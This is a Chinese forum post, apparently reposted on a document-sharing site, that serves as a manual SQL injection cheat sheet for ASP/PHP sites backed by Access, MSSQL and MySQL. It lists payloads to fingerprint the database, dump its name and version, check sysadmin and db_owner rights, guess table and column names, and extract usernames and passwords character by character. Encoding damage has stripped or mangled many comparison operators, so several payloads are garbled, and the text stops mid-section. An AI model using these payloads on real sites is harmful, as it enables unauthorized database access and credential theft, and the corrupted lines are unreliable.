[各种手工注入,来研究研究吧.docVIP

各种手工注入，来研究研究吧 [复制链接] 发表于 7?天前 |只看该作者 |倒序浏览 渗透之脚本入侵（ASP，PHP）1. 数字型：view sourceprint?1 and 1=1 and 1=2 2.字符型：view sourceprint?1 and 1=1 and 1=2 3.搜索型：view sourceprint?1 % and 1=1 and %=% 或者 % and 1=2 and %=% （PS：第三个大家可能不常用，他一般在ASP脚本中一般写成：keyword=request（”keyword”），赋值“KYO”到SQL语句中的时候即变为Select * from 表名 where keyword like ‘%KYO%’）语句型（IIS报不报错，语句自己区分）：? ?? ?? ? and user0??? ?? ?? ? and??(select count(*) from msysobjects)0 ……（页面错误为access数据库）? ?? ?? ? and??(select count(*) from sysobjects)0 ……（页面正常为MSSQL数据库）? ?? ?? ? and??db_name（）0 ……(爆数据库名)? ?? ?? ?and 0(select @@version)--??(爆SQLServer版本信息以及服务器操作系统的类型和版本信息) ? ???粗略型：加 ’（根据服务器报错的信息来判断）? ?? ???加 ;--（；和--MSSQL数据库里面一般都有， ； 表示分离，-- 则是注释符ACCESS数据库里没有）? ?判断MYSQL权限：? ?? ?? ?? ?? ?? ?? ?and 0（Select ISSRVROLEMEMBER（’sysadmin’））--（页面正常则为SA）? ?? ?? ? and 0（Select IS_MEMBER（’db_owner’））--（页面正常则为db_owner）? ?? ?? ?? ?? ?? ?and 0（Select IS_MEMBER（’public’））--（页面正常则是public）? ???PS：以上方法适用于参数是int的时候，若为字符型，需在参数后添加’和查询语句后添加；开始进行SQL注入(ACCESS)：? ?? ? ??猜解表名：? ?? ?? ? and 0(select count(*) from 表名) 或and exists（Select * from 表名）? ?? ?? ?? ?? ?? ?? ?? ?and 1(select count(*) from 表名) （页面错误说明帐号数目就是1个）? ?? ?? ?猜解字段:? ? and exists（Select 字段名 from 表名）（页面正常存在，不正常不存在）? ?? ?? ?猜解用户名和密码长度：? ?? ?? ?? ?? ?? ?and（Select top 1 len（列名） from 表名）N （TOP表示把最前面的一条记录提取出来；N为变换猜解的列长度，页面错误即说明该列长度为N）? ?? ?? ?? ?? ?? ? ? ?? ?? ?? ?? ?? ? 如：and 1=(select count(*) from user where len(name)6) 错误 ? ?? ?? ?? ?? ?? ? and 1=(select count(*) from user where len(name)5) 正确 ? ?? ?? ?? ?? ?? ???? ?? ?? ?? ? 猜解用户名和密码：and (select top 1 asc(mid(列名,1,1)) from 表名)0 ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???如：and (select top 1 asc(mid(user,1,1)) from name)96页面正常? ?? ?? ?? ?? ?? ?? ?? ? and (select top 1 asc(mid(user,1,1)) from name)97页面错误? ?? ?? ?? ?? ?? ?? ?? ? 则ASCLL码为97? ?? ?? ?? ?? ?PS：因为MD5的密文只有16,18,32,40这几个，所以猜解密码的时候只要试一试15,16,17,18,31,32,39,40等就简单些。开始进行SQL注入(MYSQL)：? ???? ?? ?? ?? ? 爆出表名和字段： having 1=1-- - ? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?插入新记录： g